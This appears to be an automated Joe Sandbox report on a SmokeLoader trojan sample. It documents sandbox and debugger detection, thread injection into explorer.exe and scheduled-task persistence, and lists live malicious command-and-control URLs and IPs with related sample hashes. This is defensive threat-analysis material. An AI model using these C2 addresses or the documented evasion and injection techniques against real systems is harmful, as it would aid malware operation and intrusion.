Source: explorer.exe, 00000001.00000000.1719274631.00000000078A0000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}$
Source: explorer.exe, 00000001.00000000.1721545742.00000000098A8000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: explorer.exe, 00000001.00000000.1717954667.0000000001248000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&0000000}
Source: explorer.exe, 00000001.00000000.1719274631.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000001.00000000.1721545742.0000000009977000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware SATA CD00
Source: explorer.exe, 00000001.00000000.1719274631.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: NXTTAVMWare
Source: explorer.exe, 00000001.00000000.1720881139.0000000009815000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f&0&000000
Source: explorer.exe, 00000001.00000000.1720881139.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1720881139.000000000982D000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: explorer.exe, 00000001.00000000.1721545742.0000000009977000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
Source: explorer.exe, 00000001.00000000.1719274631.0000000007A34000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWen-GBnx
Source: explorer.exe, 00000001.00000000.1720881139.0000000009660000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000er
Source: explorer.exe, 00000001.00000000.1717954667.0000000001248000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: explorer.exe, 00000001.00000000.1717954667.0000000001248000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

Source: C:\Users\user\Desktop\k8JAXb3Lhs.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\k8JAXb3Lhs.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))

Source: C:\Users\user\Desktop\k8JAXb3Lhs.exe	System information queried: CodeIntegrityInformation			Jump to behavior
Source: C:\Users\user\AppData\Roaming\sfjujsr	System information queried: CodeIntegrityInformation			Jump to behavior

Source: C:\Users\user\Desktop\k8JAXb3Lhs.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Users\user\AppData\Roaming\sfjujsr	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\Desktop\k8JAXb3Lhs.exe	Code function: 0_2_025F092B mov eax, dword ptr fs:[00000030h]	0_2_025F092B
Source: C:\Users\user\Desktop\k8JAXb3Lhs.exe	Code function: 0_2_025F0D90 mov eax, dword ptr fs:[00000030h]	0_2_025F0D90
Source: C:\Users\user\Desktop\k8JAXb3Lhs.exe	Code function: 0_2_0286F014 push dword ptr fs:[00000030h]	0_2_0286F014
Source: C:\Users\user\AppData\Roaming\sfjujsr	Code function: 4_2_0271092B mov eax, dword ptr fs:[00000030h]	4_2_0271092B
Source: C:\Users\user\AppData\Roaming\sfjujsr	Code function: 4_2_02710D90 mov eax, dword ptr fs:[00000030h]	4_2_02710D90
Source: C:\Users\user\AppData\Roaming\sfjujsr	Code function: 4_2_0274E9B4 push dword ptr fs:[00000030h]	4_2_0274E9B4

HIPS / PFW / Operating System Protection Evasion

Benign windows process drops PE files

Source: C:\Windows\explorer.exe

File created: sfjujsr.1.dr

Jump to dropped file

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 187.131.253.169 80			Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 78.89.199.216 80			Jump to behavior

Creates a thread in another existing process (thread injection)

Source: C:\Users\user\Desktop\k8JAXb3Lhs.exe	Thread created: C:\Windows\explorer.exe EIP: 13619A8			Jump to behavior
Source: C:\Users\user\AppData\Roaming\sfjujsr	Thread created: unknown EIP: 7DC19A8			Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\k8JAXb3Lhs.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Users\user\Desktop\k8JAXb3Lhs.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sfjujsr	Section loaded: NULL target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sfjujsr	Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read	Jump to behavior

Source: explorer.exe, 00000001.00000000.1719118353.0000000004CE0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1720881139.0000000009815000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1718164514.00000000018A0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000001.00000000.1718164514.00000000018A0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000001.00000000.1717954667.0000000001248000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 1Progman$
Source: explorer.exe, 00000001.00000000.1718164514.00000000018A0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock
Source: explorer.exe, 00000001.00000000.1718164514.00000000018A0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: }Program Manager

Source: C:\Users\user\AppData\Roaming\sfjujsr

Code function: 7_2_00406F4A GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

7_2_00406F4A

Stealing of Sensitive Information

Yara detected SmokeLoader

Source: Yara match	File source: 00000000.00000002.1729177326.0000000002631000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.1973355708.00000000043B1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1729125452.0000000002600000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.1973179203.00000000040C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Yara detected SmokeLoader

Source: Yara match	File source: 00000000.00000002.1729177326.0000000002631000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.1973355708.00000000043B1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1729125452.0000000002600000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.1973179203.00000000040C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Exploitation for Client Execution	1 DLL Side-Loading	32 Process Injection	11 Masquerading	OS Credential Dumping	1 System Time Discovery	Remote Services	Data from Local System	2 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 DLL Side-Loading	12 Virtualization/Sandbox Evasion	LSASS Memory	411 Security Software Discovery	Remote Desktop Protocol	Data from Removable Media	3 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	32 Process Injection	Security Account Manager	12 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	113 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Hidden Files and Directories	NTDS	3 Process Discovery	Distributed Component Object Model	Input Capture	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Obfuscated Files or Information	LSA Secrets	1 Application Window Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Software Packing	Cached Domain Credentials	1 File and Directory Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	13 System Information Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 File Deletion	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
k8JAXb3Lhs.exe	100%	Avira	HEUR/AGEN.1310247
k8JAXb3Lhs.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Roaming\sfjujsr	100%	Avira	HEUR/AGEN.1310247
C:\Users\user\AppData\Roaming\sfjujsr	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV	0%	URL Reputation	safe
https://powerpoint.office.comcember	0%	URL Reputation	safe
https://api.msn.com:443/v1/news/Feed/Windows?	0%	URL Reputation	safe
https://excel.office.com	0%	URL Reputation	safe
http://schemas.micro	0%	URL Reputation	safe
https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew	0%	URL Reputation	safe
https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe	0%	URL Reputation	safe
https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings	0%	URL Reputation	safe
https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew	0%	URL Reputation	safe
https://android.notify.windows.com/iOS	0%	URL Reputation	safe
https://api.msn.com/	0%	URL Reputation	safe
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
nwgrus.ru	78.89.199.216	true	true		unknown

Contacted URLs

Name	Malicious	Reputation
http://unicea.ws/tmp/index.php	true	unknown
http://nwgrus.ru/tmp/index.php	true	unknown
http://tech-servers.in.net/tmp/index.php	true	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://aka.ms/odirmr	explorer.exe, 00000001.00000000.1719274631.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV	explorer.exe, 00000001.00000000.1719274631.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-cl	explorer.exe, 00000001.00000000.1719274631.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://powerpoint.office.comcember	explorer.exe, 00000001.00000000.1723311543.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.msn.com:443/v1/news/Feed/Windows?	explorer.exe, 00000001.00000000.1719274631.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1720881139.00000000097D4000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-	explorer.exe, 00000001.00000000.1719274631.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://excel.office.com	explorer.exe, 00000001.00000000.1723311543.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.micro	explorer.exe, 00000001.00000000.1720036058.0000000007F40000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1720434520.0000000008720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1721753963.0000000009B60000.00000002.00000001.00040000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-we	explorer.exe, 00000001.00000000.1719274631.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://simpleflying.com/how-do-you-become-an-air-traffic-controller/	explorer.exe, 00000001.00000000.1719274631.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY	explorer.exe, 00000001.00000000.1719274631.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew	explorer.exe, 00000001.00000000.1719274631.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-dark	explorer.exe, 00000001.00000000.1719274631.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-mi	explorer.exe, 00000001.00000000.1719274631.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://api.msn.com/q	explorer.exe, 00000001.00000000.1720881139.00000000097D4000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&oc	explorer.exe, 00000001.00000000.1719274631.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe	explorer.exe, 00000001.00000000.1723311543.000000000C893000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.msn.com/en-us/lifestyle/lifestyle-buzz/biden-makes-decision-that-will-impact-more-than-1	explorer.exe, 00000001.00000000.1719274631.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svg	explorer.exe, 00000001.00000000.1719274631.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-dark	explorer.exe, 00000001.00000000.1719274631.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-A	explorer.exe, 00000001.00000000.1719274631.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1719274631.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg	explorer.exe, 00000001.00000000.1719274631.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.autoitscript.com/autoit3/J	explorer.exe, 00000001.00000000.1723311543.000000000C964000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://wns.windows.com/L	explorer.exe, 00000001.00000000.1723311543.000000000C557000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://word.office.com	explorer.exe, 00000001.00000000.1723311543.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings	explorer.exe, 00000001.00000000.1719274631.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu	explorer.exe, 00000001.00000000.1719274631.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://www.msn.com/en-us/news/topic/breast%20cancer%20awareness%20month?ocid=winp1headerevent	explorer.exe, 00000001.00000000.1719274631.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-win	explorer.exe, 00000001.00000000.1719274631.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew	explorer.exe, 00000001.00000000.1719274631.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-	explorer.exe, 00000001.00000000.1719274631.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://aka.ms/Vh5j3k	explorer.exe, 00000001.00000000.1719274631.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu	explorer.exe, 00000001.00000000.1719274631.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://api.msn.com/v1/news/Feed/Windows?&	explorer.exe, 00000001.00000000.1720881139.00000000096DF000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svg	explorer.exe, 00000001.00000000.1719274631.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-dark	explorer.exe, 00000001.00000000.1719274631.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://www.rd.com/list/polite-habits-campers-dislike/	explorer.exe, 00000001.00000000.1719274631.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://android.notify.windows.com/iOS	explorer.exe, 00000001.00000000.1723311543.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.msn.com/en-us/news/us/metro-officials-still-investigating-friday-s-railcar-derailment/ar	explorer.exe, 00000001.00000000.1719274631.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.img	explorer.exe, 00000001.00000000.1719274631.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://api.msn.com/	explorer.exe, 00000001.00000000.1720881139.00000000097D4000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.msn.com/en-us/news/politics/exclusive-john-kelly-goes-on-the-record-to-confirm-several-d	explorer.exe, 00000001.00000000.1719274631.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://outlook.com_	explorer.exe, 00000001.00000000.1723311543.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark	explorer.exe, 00000001.00000000.1719274631.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.msn.com:443/en-us/feed	explorer.exe, 00000001.00000000.1719274631.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppe	explorer.exe, 00000001.00000000.1719274631.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-at	explorer.exe, 00000001.00000000.1719274631.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://www.msn.com/en-us/weather/topstories/rest-of-hurricane-season-in-uncharted-waters-because-of	explorer.exe, 00000001.00000000.1719274631.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
187.131.253.169	unknown	Mexico		8151	UninetSAdeCVMX	true
78.89.199.216	nwgrus.ru	Kuwait		29357	WATANIYATELECOM-ASKW	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1523398
Start date and time:	2024-10-01 15:16:06 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 7m 47s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	7
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	k8JAXb3Lhs.exe renamed because original name is a hash value
Original Sample Name:	eead7a529f768cd0a74a639ff806357c.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@3/2@6/2
EGA Information:	Successful, ratio: 66.7%
HCA Information:	Successful, ratio: 92% Number of executed functions: 30 Number of non-executed functions: 9
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded IPs from analysis (whitelisted): 20.190.159.68, 20.190.159.0, 40.126.31.69, 20.190.159.64, 40.126.31.67, 20.190.159.71, 20.190.159.23, 40.126.31.73
Excluded domains from analysis (whitelisted): prdv4a.aadg.msidentity.com, ocsp.digicert.com, slscr.update.microsoft.com, login.live.com, www.tm.v4.a.prd.aadg.akadns.net, ctldl.windowsupdate.com, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, www.tm.lg.prod.aadmsa.trafficmanager.net
Execution Graph export aborted for target sfjujsr, PID 3452 because there are no executed function
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtEnumerateKey calls found.
Report size getting too big, too many NtOpenKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
VT rate limit hit for: k8JAXb3Lhs.exe

Simulations

Behavior and APIs

Time	Type	Description
09:17:19	API Interceptor	459412x Sleep call for process: explorer.exe modified
14:17:20	Task Scheduler	Run new task: Firefox Default Browser Agent F0D68183B38DD430 path: C:\Users\user\AppData\Roaming\sfjujsr

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
78.89.199.216	file.exe	Get hash	malicious	SmokeLoader	Browse	nwgrus.ru/tmp/index.php
	kjR9pmEPvT.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer, SmokeLoader	Browse	100xmargin.com/tmp/index.php
	45oPcWSKOp.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer, SmokeLoader	Browse	mzxn.ru/tmp/index.php
	FpiUD4nYpj.exe	Get hash	malicious	LummaC, AsyncRAT, Go Injector, LummaC Stealer, SmokeLoader, VenomRAT	Browse	mzxn.ru/tmp/index.php
	TfsbrHNaOX.exe	Get hash	malicious	Djvu	Browse	cajgtus.com/lancer/get.php?pid=3C8DAB0A318E3BBE55D6418C454BF200
	Nlwkg1ycJ4.exe	Get hash	malicious	Babuk, Djvu	Browse	cajgtus.com/lancer/get.php?pid=63423FF445583FE5A9A41B7CFEC3D9C4
	LavMqtzZNw.exe	Get hash	malicious	LummaC, SmokeLoader	Browse	movlat.com/tmp/
	1Vkf7silOj.exe	Get hash	malicious	LummaC, Amadey, Mars Stealer, PureLog Stealer, RedLine, SmokeLoader, Stealc	Browse	movlat.com/tmp/
	OU4gKY1zMo.exe	Get hash	malicious	Amadey	Browse	jkshb.su/forum/index.php
	uBgwoHPWaf.exe	Get hash	malicious	LummaC, CryptOne, LummaC Stealer, SmokeLoader, Vidar	Browse	dbfhns.in/tmp/index.php

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
nwgrus.ru	OCYe9qcxiM.exe	Get hash	malicious	SmokeLoader	Browse	187.228.112.175
	file.exe	Get hash	malicious	SmokeLoader	Browse	190.249.193.233
	file.exe	Get hash	malicious	SmokeLoader	Browse	210.182.29.70
	KTh1gQlT9a.exe	Get hash	malicious	SmokeLoader	Browse	116.58.10.60
	file.exe	Get hash	malicious	SmokeLoader	Browse	190.13.174.94
	Cjmw6m68OV.exe	Get hash	malicious	SmokeLoader	Browse	109.175.29.39
	file.exe	Get hash	malicious	SmokeLoader	Browse	185.18.245.58
	file.exe	Get hash	malicious	SmokeLoader	Browse	93.118.137.82
	OcH6iVxcMe.exe	Get hash	malicious	SmokeLoader	Browse	211.181.24.133
	file.exe	Get hash	malicious	SmokeLoader	Browse	119.204.11.2

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
UninetSAdeCVMX	OCYe9qcxiM.exe	Get hash	malicious	SmokeLoader	Browse	187.228.112.175
	SecuriteInfo.com.Linux.Siggen.9999.28931.8128.elf	Get hash	malicious	Mirai	Browse	187.223.45.136
	file.exe	Get hash	malicious	Phorpiex	Browse	187.173.216.137
	rsJtZBgpwG.elf	Get hash	malicious	Mirai	Browse	189.181.107.122
	SecuriteInfo.com.Linux.Siggen.9999.1529.24643.elf	Get hash	malicious	Unknown	Browse	189.181.178.51
	CNpQfI8eIT.exe	Get hash	malicious	SmokeLoader	Browse	187.211.53.230
	SecuriteInfo.com.Linux.Siggen.9999.29695.14613.elf	Get hash	malicious	Unknown	Browse	187.218.27.151
	SecuriteInfo.com.Linux.Siggen.9999.31454.15725.elf	Get hash	malicious	Unknown	Browse	201.109.143.199
	SecuriteInfo.com.Linux.Siggen.9999.11593.30273.elf	Get hash	malicious	Unknown	Browse	187.237.52.148
	SecuriteInfo.com.Linux.Siggen.9999.18891.22819.elf	Get hash	malicious	Unknown	Browse	187.170.10.121
WATANIYATELECOM-ASKW	file.exe	Get hash	malicious	SmokeLoader	Browse	78.89.199.216
	95.214.27.183-x86-2024-09-02T08_52_28.elf	Get hash	malicious	Unknown	Browse	188.70.232.225
	kjR9pmEPvT.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer, SmokeLoader	Browse	78.89.199.216
	45oPcWSKOp.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer, SmokeLoader	Browse	78.89.199.216
	FpiUD4nYpj.exe	Get hash	malicious	LummaC, AsyncRAT, Go Injector, LummaC Stealer, SmokeLoader, VenomRAT	Browse	78.89.199.216
	TfsbrHNaOX.exe	Get hash	malicious	Djvu	Browse	78.89.199.216
	Nlwkg1ycJ4.exe	Get hash	malicious	Babuk, Djvu	Browse	78.89.199.216
	https://skposta.serv00.net/	Get hash	malicious	Unknown	Browse	185.146.240.184
	file.exe	Get hash	malicious	SmokeLoader	Browse	78.89.199.216
	LavMqtzZNw.exe	Get hash	malicious	LummaC, SmokeLoader	Browse	78.89.199.216

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	369664
Entropy (8bit):	6.992143639446749
Encrypted:	false
SSDEEP:	6144:o1JYtwjCacpD0fbtNorAJoKURDOT42P12YO5LqxuGG8eskEGtwc:Ui2jCacpofbtNRJoSHbkGVGtw
MD5:	EEAD7A529F768CD0A74A639FF806357C
SHA1:	5FEA9C1F649F81DFCA7F19AF1CABC8AAB2B01829
